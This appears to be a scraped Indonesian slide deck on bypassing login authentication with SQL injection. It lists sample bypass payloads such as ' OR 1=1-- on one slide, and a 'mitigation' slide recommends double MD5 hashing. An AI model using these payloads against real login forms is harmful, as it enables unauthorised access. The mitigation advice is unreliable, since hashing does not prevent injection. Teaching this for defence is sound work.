![• Andalkan Enkripsi password / merubah algoritma autentikasi login /
Sistem Filter.
Contoh Enkripsi:
Before
$input_password=$_POST[password];
After
$input_password=md5(md5($_POST[password]).md5(‘karakter
acak’));
Contoh Algoritma:
$contohsih=mysql_fetch_array($r);
if($jml_row >0 && ($contohsih[password]==$input_password))
PENANGGULANGAN](https://image.slidesharecdn.com/materi2b-170818203010/85/Bypass-Login-Authentication-5-320.jpg)
Bypass Login Authentication
- 1. BYPASS LOGIN SQL TEAM PENTEST
- 2. • Adalah sebuah teknik yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. BYPASS SQL INJECTION
- 3. • true AND true = true true AND false = false false AND false = false false AND true = false • "AND" membandingkan true dengan true. jika kedua terbanding bernilai true, maka return true. jika salah satu atau kedua nya false, maka return false. • true OR true = true true OR false = true false OR true = true false OR false = false • jika salah satu TRUE, maka return akan memberikan TRUE. FAKTOR PEMBANDING
- 4. • ‘Surabayablackhat' OR 1=1--‘ • Komentartembus’# • katanyaheker' or true-- • NothingImposible' or 1=1-- • haruskreatifmengolahkata' OR 'a'='a'-- SAMPLE
- 5. • Andalkan Enkripsi password / merubah algoritma autentikasi login / Sistem Filter. Contoh Enkripsi: Before $input_password=$_POST[password]; After $input_password=md5(md5($_POST[password]).md5(‘karakter acak’)); Contoh Algoritma: $contohsih=mysql_fetch_array($r); if($jml_row >0 && ($contohsih[password]==$input_password)) PENANGGULANGAN
- 7. REFERENSI • https://www.netsparker.com/blog/web- security/sql-injection-cheat-sheet/ • https://en.wikipedia.org/wiki/SQL_injection • http://knoxd3.blogspot.co.id/20 • 14/01/cheat-sheet-for-admin-page-bypass-sql.html • http://www.elangsakti.com/2013/03/php-teknik- atau-cara-sederhana-untuk.html
- 8. TERIMA KASIH